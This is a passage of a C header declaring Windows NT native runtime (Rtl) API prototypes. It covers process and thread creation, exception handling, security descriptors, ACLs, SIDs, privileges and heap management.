PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,\n    _In_ PUNICODE_STRING ImagePathName,\n    _In_opt_ PUNICODE_STRING DllPath,\n    _In_opt_ PUNICODE_STRING CurrentDirectory,\n    _In_opt_ PUNICODE_STRING CommandLine,\n    _In_opt_ PVOID Environment,\n    _In_opt_ PUNICODE_STRING WindowTitle,\n    _In_opt_ PUNICODE_STRING DesktopInfo,\n    _In_opt_ PUNICODE_STRING ShellInfo,\n    _In_opt_ PUNICODE_STRING RuntimeData,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateUserProcess(\n    _In_ PUNICODE_STRING NtImagePathName,\n    _In_ ULONG Attributes,\n    _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters,\n    _In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,\n    _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,\n    _In_opt_ HANDLE ParentProcess,\n    _In_ BOOLEAN InheritHandles,\n    _In_opt_ HANDLE DebugPort,\n    _In_opt_ HANDLE ExceptionPort,\n    _Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateUserThread(\n    _In_ HANDLE Process,\n    _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,\n    _In_ BOOLEAN CreateSuspended,\n    _In_ ULONG StackZeroBits,\n    _In_opt_ SIZE_T MaximumStackSize,\n    _In_opt_ SIZE_T 
InitialStackSize,\n    _In_ PUSER_THREAD_START_ROUTINE StartAddress,\n    _In_opt_ PVOID Parameter,\n    _Out_opt_ PHANDLE Thread,\n    _Out_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlExitUserThread(\n    _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlExitUserProcess(\n    _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeUserThreadStack(\n    _In_ HANDLE hProcess,\n    _In_ HANDLE hThread);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlPushFrame(\n    _In_ PTEB_ACTIVE_FRAME Frame);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlPopFrame(\n    _In_ PTEB_ACTIVE_FRAME Frame);\n\nNTSYSAPI\nPTEB_ACTIVE_FRAME\nNTAPI\nRtlGetFrame(\n    VOID);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEncodePointer(\n    _In_ PVOID Ptr);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlDecodePointer(\n    _In_ PVOID Ptr);\n\n/************************************************************************************\n*\n* RTL Memory Buffer API.\n*\n************************************************************************************/\n\nNTSYSAPI\nSIZE_T\nNTAPI\nRtlCompareMemoryUlong(\n    _In_ PVOID Source,\n    _In_ SIZE_T Length,\n    _In_ ULONG Pattern);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFillMemoryUlong(\n    _Out_ PVOID Destination,\n    _In_ SIZE_T Length,\n    _In_ ULONG Pattern);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFillMemoryUlonglong(\n    _Out_ PVOID Destination,\n    _In_ SIZE_T Length,\n    _In_ ULONGLONG Pattern);\n\n/************************************************************************************\n*\n* RTL PEB API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPPEB\nNTAPI\nRtlGetCurrentPeb(\n    VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquirePebLock(\n    VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleasePebLock(\n    VOID);\n\n/************************************************************************************\n*\n* RTL Exception Handling 
API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddVectoredExceptionHandler(\n    _In_ ULONG First,\n    _In_ PVECTORED_EXCEPTION_HANDLER Handler);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRemoveVectoredExceptionHandler(\n    _In_ PVOID Handle);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDispatchException(\n    _In_ PEXCEPTION_RECORD ExceptionRecord,\n    _In_ PCONTEXT ContextRecord);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddVectoredContinueHandler(\n    _In_ ULONG First,\n    _In_ PVECTORED_EXCEPTION_HANDLER Handler);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRemoveVectoredContinueHandler(\n    _In_ PVOID Handle);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRaiseException(\n    _In_ PEXCEPTION_RECORD ExceptionRecord);\n\nNTSYSAPI\nDECLSPEC_NORETURN\nVOID\nNTAPI\nRtlRaiseStatus(\n    _In_ NTSTATUS Status);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtContinue(\n    _In_ PCONTEXT ContextRecord,\n    _In_ BOOLEAN TestAlert);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRaiseException(\n    _In_ PEXCEPTION_RECORD ExceptionRecord,\n    _In_ PCONTEXT ContextRecord,\n    _In_ BOOLEAN FirstChance);\n\n__analysis_noreturn\nNTSYSAPI\nVOID\nNTAPI\nRtlAssert(\n    _In_ PVOID VoidFailedAssertion,\n    _In_ PVOID VoidFileName,\n    _In_ ULONG LineNumber,\n    _In_opt_ PSTR MutableMessage);\n\n#define RTL_ASSERT(exp) \\\n    ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE)\n#define RTL_ASSERTMSG(msg, exp) \\\n    ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE)\n#define RTL_SOFT_ASSERT(_exp) \\\n    ((!(_exp)) ? (DbgPrint(\"%s(%d): Soft assertion failed\\n   Expression: %s\\n\", __FILE__, __LINE__, #_exp), FALSE) : TRUE)\n#define RTL_SOFT_ASSERTMSG(_msg, _exp) \\\n    ((!(_exp)) ? 
(DbgPrint(\"%s(%d): Soft assertion failed\\n   Expression: %s\\n   Message: %s\\n\", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE)\n\ntypedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)(\n    _In_ PEXCEPTION_POINTERS ExceptionInfo\n    );\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetUnhandledExceptionFilter(\n    _In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlUnhandledExceptionFilter(\n    _In_ PEXCEPTION_POINTERS ExceptionPointers);\n\n/************************************************************************************\n*\n* RTL Security API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetOwnerSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _Out_ PSID *Owner,\n    _Out_ PBOOLEAN OwnerDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetGroupSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _Out_ PSID *Group,\n    _Out_ PBOOLEAN GroupDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ ULONG Revision);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetOwnerSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ PSID Owner,\n    _In_ BOOLEAN OwnerDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,\n    _Out_ PSECURITY_DESCRIPTOR* OutputSecurityDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlMakeSelfRelativeSD(\n    _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n    _Out_writes_bytes_(*BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n    _Inout_ PULONG BufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAbsoluteToSelfRelativeSD(\n    _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n    _Out_writes_bytes_to_opt_(*BufferLength, *BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n    _Inout_ PULONG 
BufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSelfRelativeToAbsoluteSD(\n    _In_ PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n    _Out_writes_bytes_to_opt_(*AbsoluteSecurityDescriptorSize, *AbsoluteSecurityDescriptorSize) PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n    _Inout_ PULONG AbsoluteSecurityDescriptorSize,\n    _Out_writes_bytes_to_opt_(*DaclSize, *DaclSize) PACL Dacl,\n    _Inout_ PULONG DaclSize,\n    _Out_writes_bytes_to_opt_(*SaclSize, *SaclSize) PACL Sacl,\n    _Inout_ PULONG SaclSize,\n    _Out_writes_bytes_to_opt_(*OwnerSize, *OwnerSize) PSID Owner,\n    _Inout_ PULONG OwnerSize,\n    _Out_writes_bytes_to_opt_(*PrimaryGroupSize, *PrimaryGroupSize) PSID PrimaryGroup,\n    _Inout_ PULONG PrimaryGroupSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetDaclSecurityDescriptor(\n    _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ BOOLEAN DaclPresent,\n    _In_opt_ PACL Dacl,\n    _In_ BOOLEAN DaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetDaclSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _Out_ PBOOLEAN DaclPresent,\n    _Out_ PACL* Dacl,\n    _Out_ PBOOLEAN DaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetSaclSecurityDescriptor(\n    _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ BOOLEAN SaclPresent,\n    _In_opt_ PACL Sacl,\n    _In_ BOOLEAN SaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetSaclSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _Out_ PBOOLEAN SaclPresent,\n    _Out_ PACL* Sacl,\n    _Out_ PBOOLEAN SaclDefaulted);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\n_Check_return_\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidSecurityDescriptor(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\n_Check_return_\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidRelativeSecurityDescriptor(\n    _In_reads_bytes_(SecurityDescriptorLength) PSECURITY_DESCRIPTOR SecurityDescriptorInput,\n    _In_ ULONG 
SecurityDescriptorLength,\n    _In_ SECURITY_INFORMATION RequiredInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateAcl(\n    _Out_writes_bytes_(AclLength) PACL Acl,\n    _In_ ULONG AclLength,\n    _In_ ULONG AclRevision);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidAcl(\n    _In_ PACL Acl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryInformationAcl(\n    _In_ PACL Acl,\n    _Out_writes_bytes_(AclInformationLength) PVOID AclInformation,\n    _In_ ULONG AclInformationLength,\n    _In_ ACL_INFORMATION_CLASS AclInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetInformationAcl(\n    _Inout_ PACL Acl,\n    _In_reads_bytes_(AclInformationLength) PVOID AclInformation,\n    _In_ ULONG AclInformationLength,\n    _In_ ACL_INFORMATION_CLASS AclInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG StartingAceIndex,\n    _In_reads_bytes_(AceListLength) PVOID AceList,\n    _In_ ULONG AceListLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDeleteAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceIndex);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetAce(\n    _In_ PACL Acl,\n    _In_ ULONG AceIndex,\n    _Outptr_ PVOID *Ace);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlFirstFreeAce(\n    _In_ PACL Acl,\n    _Out_ PVOID *FirstFree);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlOwnerAcesPresent(\n    _In_ PACL pAcl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedAceEx(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedAceEx(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ 
ACCESS_MASK AccessMask,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID Sid,\n    _In_ BOOLEAN AuditSuccess,\n    _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessAceEx(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID Sid,\n    _In_ BOOLEAN AuditSuccess,\n    _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedObjectAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ ACCESS_MASK AccessMask,\n    _In_opt_ GUID *ObjectTypeGuid,\n    _In_opt_ GUID *InheritedObjectTypeGuid,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedObjectAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ ACCESS_MASK AccessMask,\n    _In_opt_ GUID *ObjectTypeGuid,\n    _In_opt_ GUID *InheritedObjectTypeGuid,\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessObjectAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ ACCESS_MASK AccessMask,\n    _In_opt_ GUID *ObjectTypeGuid,\n    _In_opt_ GUID *InheritedObjectTypeGuid,\n    _In_ PSID Sid,\n    _In_ BOOLEAN AuditSuccess,\n    _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddCompoundAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ UCHAR AceType,\n    _In_ ACCESS_MASK AccessMask,\n    _In_ PSID ServerSid,\n    _In_ PSID ClientSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddMandatoryAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ PSID Sid,\n    _In_ UCHAR AceType,\n    _In_ ACCESS_MASK AccessMask);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFindAceByType(\n    _In_ PACL pAcl,\n    _In_ UCHAR AceType,\n    _Out_opt_ PULONG pIndex);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlOwnerAcesPresent(\n    
_In_ PACL pAcl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDefaultNpAcl(\n    _Out_ PACL* Acl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddProcessTrustLabelAce(\n    _Inout_ PACL Acl,\n    _In_ ULONG AceRevision,\n    _In_ ULONG AceFlags,\n    _In_ PSID ProcessTrustLabelSid,\n    _In_ UCHAR AceType,\n    _In_ ACCESS_MASK AccessMask);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidSid(\n    _In_ PSID Sid);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualSid(\n    _In_ PSID Sid1,\n    _In_ PSID Sid2);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualPrefixSid(\n    _In_ PSID Sid1,\n    _In_ PSID Sid2);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthRequiredSid(\n    _In_ ULONG SubAuthorityCount);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFreeSid(\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAllocateAndInitializeSid(\n    _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n    _In_ UCHAR SubAuthorityCount,\n    _In_ ULONG SubAuthority0,\n    _In_ ULONG SubAuthority1,\n    _In_ ULONG SubAuthority2,\n    _In_ ULONG SubAuthority3,\n    _In_ ULONG SubAuthority4,\n    _In_ ULONG SubAuthority5,\n    _In_ ULONG SubAuthority6,\n    _In_ ULONG SubAuthority7,\n    _Out_ PSID *Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeSid(\n    _Out_ PSID Sid,\n    _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n    _In_ UCHAR SubAuthorityCount);\n\nNTSYSAPI\nPSID_IDENTIFIER_AUTHORITY\nNTAPI\nRtlIdentifierAuthoritySid(\n    _In_ PSID Sid);\n\nNTSYSAPI\nPULONG\nNTAPI\nRtlSubAuthoritySid(\n    _In_ PSID Sid,\n    _In_ ULONG SubAuthority);\n\nNTSYSAPI\nPUCHAR\nNTAPI\nRtlSubAuthorityCountSid(\n    _In_ PSID Sid);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthSid(\n    _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySid(\n    _In_ ULONG DestinationSidLength,\n    _In_ PSID DestinationSid,\n    _In_ PSID SourceSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySidAndAttributesArray(\n    _In_ ULONG ArrayLength,\n    _In_ PSID_AND_ATTRIBUTES Source,\n    _In_ ULONG TargetSidBufferSize,\n    _Out_ PSID_AND_ATTRIBUTES TargetArrayElement,\n    _Out_ PSID TargetSid,\n 
   _Out_ PSID *NextTargetSid,\n    _Out_ PULONG RemainingTargetSidBufferSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLengthSidAsUnicodeString(\n    _In_ PSID Sid,\n    _Out_ PULONG StringLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlConvertSidToUnicodeString(\n    _In_ PUNICODE_STRING UnicodeString,\n    _In_ PSID Sid,\n    _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateServiceSid(\n    _In_ PUNICODE_STRING ServiceName,\n    _Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid,\n    _Inout_ PULONG ServiceSidLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSidEqualLevel(\n    _In_ PSID Sid1,\n    _In_ PSID Sid2,\n    _Out_ PBOOLEAN EqualLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSidIsHigherLevel(\n    _In_ PSID Sid1,\n    _In_ PSID Sid2,\n    _Out_ PBOOLEAN HigherLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlReplaceSidInSd(\n    _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ PSID OldSid,\n    _In_ PSID NewSid,\n    _Out_ ULONG* NumChanges);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsElevatedRid(\n    _In_ PSID_AND_ATTRIBUTES SidAttr);\n\nFORCEINLINE \nLUID \nNTAPI \nRtlConvertLongToLuid(\n    _In_ LONG Long\n)\n{\n    LUID TempLuid;\n    LARGE_INTEGER TempLi;\n\n    TempLi.QuadPart = Long;\n    TempLuid.LowPart = TempLi.LowPart;\n    TempLuid.HighPart = TempLi.HighPart;\n    return(TempLuid);\n}\n\nFORCEINLINE \nLUID \nRtlConvertUlongToLuid(\n    _In_ ULONG Ulong\n)\n{\n    LUID tempLuid;\n\n    tempLuid.LowPart = Ulong;\n    tempLuid.HighPart = 0;\n\n    return tempLuid;\n}\n\nNTSYSAPI\nULONG\nNTAPI\nRtlUniform(\n    _Inout_ PULONG Seed);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRandomEx(\n    _Inout_ PULONG Seed);\n\nNTSYSAPI\nULONG32\nNTAPI\nRtlComputeCrc32(\n    _In_ ULONG32 PartialCrc,\n    _In_ PVOID Buffer,\n    _In_ ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAdjustPrivilege(\n    _In_ ULONG Privilege,\n    _In_ BOOLEAN Enable,\n    _In_ BOOLEAN Client,\n    _Out_ PBOOLEAN WasEnabled);\n\n#define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001\n#define 
RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAcquirePrivilege(\n    _In_ PULONG Privilege,\n    _In_ ULONG NumPriv,\n    _In_ ULONG Flags,\n    _Out_ PVOID* ReturnedState);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleasePrivilege(\n    _In_ PVOID StatePointer);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlRemovePrivileges(\n    _In_ HANDLE TokenHandle,\n    _In_ PULONG PrivilegesToKeep,\n    _In_ ULONG PrivilegeCount);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreAllAccessesGranted(\n    _In_ ACCESS_MASK GrantedAccess,\n    _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreAnyAccessesGranted(\n    _In_ ACCESS_MASK GrantedAccess,\n    _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlMapGenericMask(\n    _In_ PACCESS_MASK AccessMask,\n    _In_ PGENERIC_MAPPING GenericMapping);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImpersonateSelf(\n    _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImpersonateSelfEx(\n    _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,\n    _In_opt_ ACCESS_MASK AdditionalAccess,\n    _Out_opt_ PHANDLE ThreadToken);\n\n/************************************************************************************\n*\n* RTL Version API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetVersion(\n    _Inout_\tPRTL_OSVERSIONINFOW lpVersionInformation);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlGetNtVersionNumbers(\n    _Out_opt_ PULONG MajorVersion,\n    _Out_opt_ PULONG MinorVersion,\n    _Out_opt_ PULONG BuildNumber);\n\n/************************************************************************************\n*\n* RTL Error Status API.\n*\n************************************************************************************/\n\n_When_(Status < 0, _Out_range_(> , 0))\n_When_(Status >= 0, _Out_range_(== , 0))\nNTSYSAPI\nULONG\nNTAPI\nRtlNtStatusToDosError(\n    _In_ NTSTATUS Status);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetLastWin32Error(\n    
_In_ LONG Win32Error);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetLastNtStatus(\n    VOID);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlGetLastWin32Error(\n    VOID);\n\n_When_(Status < 0, _Out_range_(> , 0))\n_When_(Status >= 0, _Out_range_(== , 0))\nNTSYSAPI\nULONG\nNTAPI\nRtlNtStatusToDosErrorNoTeb(\n    _In_ NTSTATUS Status);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetLastWin32ErrorAndNtStatusFromNtStatus(\n    _In_ NTSTATUS Status);\n\n/************************************************************************************\n*\n* RTL WOW64 Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64EnableFsRedirection(\n    _In_ BOOLEAN Wow64FsEnableRedirection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64EnableFsRedirectionEx(\n    _In_ PVOID DisableFsRedirection,\n    _Out_ PVOID *OldFsRedirectionLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64GetThreadContext(\n    _In_ HANDLE ThreadHandle,\n    _Inout_ PWOW64_CONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64SetThreadContext(\n    _In_ HANDLE ThreadHandle,\n    _In_ PWOW64_CONTEXT ThreadContext);\n\n/************************************************************************************\n*\n* RTL Heap Management API.\n*\n************************************************************************************/\n\ntypedef NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(\n    _In_  PVOID Base,\n    _Inout_ PVOID *CommitAddress,\n    _Inout_ PSIZE_T CommitSize\n    );\n\ntypedef struct _RTL_HEAP_PARAMETERS {\n    ULONG Length;\n    SIZE_T SegmentReserve;\n    SIZE_T SegmentCommit;\n    SIZE_T DeCommitFreeBlockThreshold;\n    SIZE_T DeCommitTotalFreeThreshold;\n    SIZE_T MaximumAllocationSize;\n    SIZE_T VirtualMemoryThreshold;\n    SIZE_T InitialCommit;\n    SIZE_T InitialReserve;\n    PRTL_HEAP_COMMIT_ROUTINE CommitRoutine;\n    SIZE_T Reserved[2];\n} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;\n\n_Must_inspect_result_\nNTSYSAPI\nPVOID\nNTAPI\nRtlCreateHeap(\n    _In_ 
ULONG Flags,\n    _In_opt_ PVOID HeapBase,\n    _In_ SIZE_T ReserveSize,\n    _In_ SIZE_T CommitSize,\n    _In_opt_ PVOID Lock,\n    _In_opt_ PRTL_HEAP_PARAMETERS Parameters);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlDestroyHeap(\n    _In_ PVOID HeapHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetHeapInformation(\n    _In_opt_ PVOID HeapHandle,\n    _In_ HEAP_INFORMATION_CLASS HeapInformationClass,\n    _In_opt_ PVOID HeapInformation,\n    _In_ SIZE_T HeapInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryHeapInformation(\n    _In_ PVOID HeapHandle,\n    _In_ HEAP_INFORMATION_CLASS HeapInformationClass,\n    _Out_opt_ PVOID HeapInformation,\n    _In_opt_ SIZE_T HeapInformationLength,\n    _Out_opt_ PSIZE_T ReturnLength);\n\n_Must_inspect_result_\nNTSYSAPI\nPVOID\nNTAPI\nRtlAllocateHeap(\n    _In_ PVOID HeapHandle,\n    _In_ ULONG Flags,\n    _In_ SIZE_T Size);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlFreeHeap(\n    _In_ PVOID HeapHandle,\n    _In_ ULONG Flags,\n    _Frees_ptr_opt_ _Post_invalid_ PVOID BaseAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlZeroHeap(\n    _In_ PVOID HeapHandle,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nSIZE_T\nNTAPI\nRtlSizeHeap(\n    _In_ PVOID HeapHandle,\n    _In_ ULONG Flags,\n    _In_ PVOID BaseAddress);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlProtectHeap(\n    _In_ PVOID HeapHandle,\n    _In_ BOOLEAN MakeReadOnly);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlReAllocateHeap(\n    _In_ PVOID HeapHandle,\n    _In_ ULONG Flags,\n    _Frees_ptr_opt_ PVOID BaseAddress,\n    _In_ SIZE_T Size);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetProcessHeaps(\n    _In_ ULONG NumberOfHeaps,\n    _Out_ PVOID *ProcessHeaps);\n\ntypedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)(\n    _In_ PVOID HeapHandle,\n    _In_ PVOID Parameter\n    );\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlEnumProcessHeaps(\n    _In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine,\n    _In_ PVOID Parameter);\n\n/************************************************************************************\n*\n* RTL Compression 
